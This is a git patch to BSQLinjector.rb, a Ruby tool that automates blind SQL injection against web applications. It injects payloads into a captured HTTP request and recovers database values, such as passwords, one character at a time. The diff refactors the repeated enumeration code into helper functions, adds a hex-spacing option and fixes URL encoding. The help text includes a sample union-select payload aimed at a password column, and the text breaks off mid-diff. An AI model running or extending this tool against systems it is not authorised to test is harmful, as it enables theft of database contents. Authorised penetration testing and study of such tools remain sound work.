From 0146806ed81a0ac7064860c9ae963ded47d850c9 Mon Sep 17 00:00:00 2001 From: enjoiz Date: Fri, 15 Jan 2016 19:44:12 +0100 Subject: [PATCH] Update BSQLinjector.rb --- BSQLinjector.rb | 1428 +++++++++-------------------------------------- 1 file changed, 278 insertions(+), 1150 deletions(-) diff --git a/BSQLinjector.rb b/BSQLinjector.rb index 9abb3ea..38245c5 100755 --- a/BSQLinjector.rb +++ b/BSQLinjector.rb @@ -24,6 +24,7 @@ $oh = "" # this character is used when opening string when comparing $bracket = ")" # substring ending brackets $case = "n" # setting case sensitivity +$hexbracket = "y" # hex delimeter - bracket (y) or space (n) $verbose = "n" # verbose messaging $test = "n" # test mode @@ -51,7 +52,7 @@ $test = "y" if arg.include?("--test") $bracket = arg.split("=")[1].to_i - 1 if arg.include?("--bracket=") alls = "y" if arg.include?("--special") - + $hexbracket = "n" if arg.include?("--hexspace") $search = arg.split("=")[1] if arg.include?("--pattern=") && arg.count("=") == 1 $prepend = arg.split("=")[1] if arg.include?("--prepend=") && arg.count("=") == 1 $append = arg.split("=")[1] if arg.include?("--append=") && arg.count("=") == 1 @@ -71,6 +72,7 @@ puts " --pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement)" puts " --prepend Mandatory - Main payload. (--prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\"" puts " --append How to end our payload. For example comment out rest of SQL statement. (--append=\'#)" + puts " --schar Character placed around chars. This character is not used while in hex mode. (--schar=\"\'\")" puts " --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)" puts "" puts " --mode Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using \"<\", \">\", \"=\" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)" @@ -83,7 +85,7 @@ puts " --test Enable test mode. Do not send request, just show full payload." puts " --comma Encode comma." puts " --bracket Add brackets to the end of substring function. --bracket=\"))\"" - puts " --schar Character placed around chars. This character is not used while in hex mode. (--schar=\"\'\")" + puts " --hexspace Use space instead of brackets to split hex values." puts " --special Include all special characters in enumeration." puts " --start Start enumeration from specified character. (--start=10)" puts " --max Maximum characters to enumerate. (--max=10)" @@ -91,7 +93,7 @@ puts " --verbose Show verbose messages." puts "" puts "Example usage:" - puts " ruby #{__FILE__} --pattern=truestatement --file=/tmp/req.txt --prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\" --append=\"\'#\" --ssl" + puts " ruby #{__FILE__} --pattern=truestatement --file=/tmp/req.txt --schar=\"'\" --prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\" --append=\"\'#\" --ssl" puts "" exit(1) else @@ -107,7 +109,7 @@ # arrays for Blind exploitation $arrs = [",", "_", "."] if alls == "y" - $arrs += ["+", "/", ":", "-", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "~", "`", "[", "]", "{", "}", ";", "<", ">", "?", "|", "\\", "\""] + $arrs += ["+", "/", "=", ":", "-", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "~", "`", "[", "]", "{", "}", ";", "<", ">", "?", "|", "\\", "\""] end $arrn1 = ["0", "1", "2", "3", "4"] $arrn2 = ["5", "6", "7", "8", "9"] @@ -176,15 +178,13 @@ def configreq(chars) if $test == "y" puts "Payload example:" if $comma == "y" - puts $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append + puts $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append else - puts $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append + puts $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append end exit(1) end - found = 0 # for detecting injected payload - # check HTTP method if File.readlines($file)[0].include?("GET ") $method = "get" @@ -192,14 +192,16 @@ def configreq(chars) $method = "post" end + found = 0 # for detecting injected payload + # get URI path $uri = File.readlines($file)[0].split(" ")[1] turi = URI.decode($uri).gsub("+", " ") if turi.include?("SQLINJECT") if $comma == "y" - $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else - $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end found = found + 1 end @@ -213,9 +215,9 @@ def configreq(chars) header = File.readlines($file)[i].chomp if header.include?("SQLINJECT") if $comma == "y" - header = header.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + header = header.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else - header = header.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + header = header.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end found = found + 1 end @@ -238,9 +240,9 @@ def configreq(chars) tline = postline.gsub("+", " ") if tline.include?("SQLINJECT") if $comma == "y" - postline = postline.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + postline = postline.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else - postline = postline.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + postline = postline.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end found = found + 1 end @@ -397,9 +399,110 @@ def send2ndreq() } end +# create between payload +def cbetween(a, b, c) + if $hex == "y" + if $hexbracket == "n" + configreq("between" + " 0x" + a.unpack('H*')[0] + " and " + "0x" + b.unpack('H*')[0]) + else + configreq("between" + "(0x" + a.unpack('H*')[0] + ")and(" + "0x" + b.unpack('H*')[0] + ")") + end + else + configreq("between" + $oh + a + $oh + "and" + $oh + b) + end + sendreq() + send2ndreq() if $secfile != "" + $fheader = "n" + $response.to_hash.each { |k,v| + $fheader = "y" if k.to_s.include?($search) + $fheader = "y" if v.to_s.include?($search) + } + if ($response.body.include?($search) || $fheader == "y") && c == "yes" + $result = $result + a + puts "Letter " + $i.to_s + " found: " + a + $letter = 1 + end +end + +# creating moreless payload +def cmoreless(a, b, c) + if $hex == "y" + if $hexbracket == "n" + configreq(a + " 0x" + b.unpack('H*')[0]) + else + configreq(a + "(0x" + b.unpack('H*')[0] + ")") + end + else + configreq(a + $oh + b) + end + sendreq() + send2ndreq() if $secfile != "" + $fheader = "n" + $response.to_hash.each { |k,v| + $fheader = "y" if k.to_s.include?($search) + $fheader = "y" if v.to_s.include?($search) + } + if ($response.body.include?($search) || $fheader == "y") && c == "yes" + $result = $result + b + puts "Letter " + $i.to_s + " found: " + b + $letter = 1 + end +end + +# creating like payload +def clike(a) + if $hex == "y" + if $hexbracket == "n" + configreq("like" + " " + "0x" + a.unpack('H*')[0]) + else + configreq("like" + "(" + "0x" + a.unpack('H*')[0] + ")") + end + else + configreq("like" + $oh + a) + end + sendreq() + send2ndreq() if $secfile != "" + $fheader = "n" + $response.to_hash.each { |k,v| + $fheader = "y" if k.to_s.include?($search) + $fheader = "y" if v.to_s.include?($search) + } + if $response.body.include?($search) || $fheader == "y" + $result = $result + a + puts "Letter " + $i.to_s + " found: " + a + $letter = 1 + end +end + +# creating equal payload +def cequal(a) + if $hex == "y" + if $hexbracket == "n" + configreq("=" + "0x" + a.unpack('H*')[0]) + else + configreq("=" + "(0x" + a.unpack('H*')[0] + ")") + end + else + configreq("=" + $oh + a) + end + sendreq() + send2ndreq() if $secfile != "" + $fheader = "n" + $response.to_hash.each { |k,v| + $fheader = "y" if k.to_s.include?($search) + $fheader = "y" if v.to_s.include?($search) + } + if $response.body.include?($search) || $fheader == "y" + $result = $result + a + puts "Letter " + $i.to_s + " found: " + a + $letter = 1 + end +end + +# do enumeration until $i >= $max do $i = $i + 1 - found = 0 + $letter = 0 if ($result == "aaaaa") puts "It seems like your payload gives always true condition. Try another parameter\'s value or different payload.\n"; break @@ -408,44 +511,16 @@ def send2ndreq() if $mode == "e" if $case == "n" for ch in $arrays - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cequal(ch) + if $letter == 1 + break end end else for ch in $arraysc - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cequal(ch) + if $letter == 1 + break end end end @@ -453,46 +528,28 @@ def send2ndreq() if $case == "n" for ch in $arrays if ch != "%" && ch != "_" - if $hex == "y" - configreq("like" + " " + "0x" + ch.unpack('H*')[0]) - else - configreq("like" + $oh + ch) + clike(ch) + if $letter == 1 + break end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + else + cequal(ch) + if $letter == 1 + break end end end else for ch in $arraysc if ch != "%" && ch != "_" - if $hex == "y" - configreq("like" + " " + "0x" + ch.unpack('H*')[0]) - else - configreq("like" + $oh + ch) + clike(ch) + if $letter == 1 + break end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + else + cequal(ch) + if $letter == 1 + break end end end @@ -501,279 +558,79 @@ def send2ndreq() elsif $mode == "b" # lowercase - if $hex == "y" - configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "z".unpack('H*')[0]) - else - configreq("between" + $oh + "a" + $oh + "and" + $oh + "z") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("a", "z", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "m".unpack('H*')[0]) - else - configreq("between" + $oh + "a" + $oh + "and" + $oh + "m") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("a", "m", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "f".unpack('H*')[0]) - else - configreq("between" + $oh + "a" + $oh + "and" + $oh + "f") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("a", "f", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "c".unpack('H*')[0]) - else - configreq("between" + $oh + "a" + $oh + "and" + $oh + "c") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("a", "c", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr1 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr2 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end else - if $hex == "y" - configreq(" between" + " 0x" + "g".unpack('H*')[0] + " and " + "0x" + "i".unpack('H*')[0]) - else - configreq("between" + $oh + "g" + $oh + "and" + $oh + "i") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("g", "i", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr3 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr4 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end end else - if $hex == "y" - configreq(" between" + " 0x" + "n".unpack('H*')[0] + " and " + "0x" + "s".unpack('H*')[0]) - else - configreq("between" + $oh + "n" + $oh + "and" + $oh + "s") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("n", "s", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "n".unpack('H*')[0] + " and " + "0x" + "p".unpack('H*')[0]) - else - configreq("between" + $oh + "n" + $oh + "and" + $oh + "p") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("n", "p", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr5 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr6 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end else - if $hex == "y" - configreq(" between" + " 0x" + "t".unpack('H*')[0] + " and " + "0x" + "v".unpack('H*')[0]) - else - configreq("between" + $oh + "t" + $oh + "and" + $oh + "v") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("t", "v", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr7 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr8 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end @@ -782,280 +639,80 @@ def send2ndreq() end # uppercase - only when case-sensitive specified - if $case == "y" && found == 0 - if $hex == "y" - configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "Z".unpack('H*')[0]) - else - configreq("between" + $oh + "A" + $oh + "and" + $oh + "Z") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + if $case == "y" && $letter == 0 + cbetween("A", "Z", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "M".unpack('H*')[0]) - else - configreq("between" + $oh + "A" + $oh + "and" + $oh + "M") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("A", "M", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "F".unpack('H*')[0]) - else - configreq("between" + $oh + "A" + $oh + "and" + $oh + "F") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("A", "F", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "C".unpack('H*')[0]) - else - configreq("between" + $oh + "A" + $oh + "and" + $oh + "C") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("A", "C", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr9 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr10 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end else - if $hex == "y" - configreq(" between" + " 0x" + "G".unpack('H*')[0] + " and " + "0x" + "I".unpack('H*')[0]) - else - configreq("between" + $oh + "G" + $oh + "and" + $oh + "I") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("G", "I", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr11 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr12 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end end else - if $hex == "y" - configreq(" between" + " 0x" + "N".unpack('H*')[0] + " and " + "0x" + "S".unpack('H*')[0]) - else - configreq("between" + $oh + "N" + $oh + "and" + $oh + "S") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("N", "S", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "N".unpack('H*')[0] + " and " + "0x" + "P".unpack('H*')[0]) - else - configreq("between" + $oh + "N" + $oh + "and" + $oh + "P") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("N", "P", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr13 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr14 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end else - if $hex == "y" - configreq(" between" + " 0x" + "T".unpack('H*')[0] + " and " + "0x" + "V".unpack('H*')[0]) - else - configreq("between" + $oh + "T" + $oh + "and" + $oh + "V") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("T", "V", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr15 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr16 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end @@ -1065,72 +722,22 @@ def send2ndreq() end # numeric - if found == 0 - if $hex == "y" - configreq(" between" + " 0x" + "0".unpack('H*')[0] + " and " + "0x" + "9".unpack('H*')[0]) - else - configreq("between" + $oh + "0" + $oh + "and" + $oh + "9") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + if $letter == 0 + cbetween("0", "9", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "0".unpack('H*')[0] + " and " + "0x" + "4".unpack('H*')[0]) - else - configreq("between" + $oh + "0" + $oh + "and" + $oh + "4") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("0", "4", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arrn1 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + 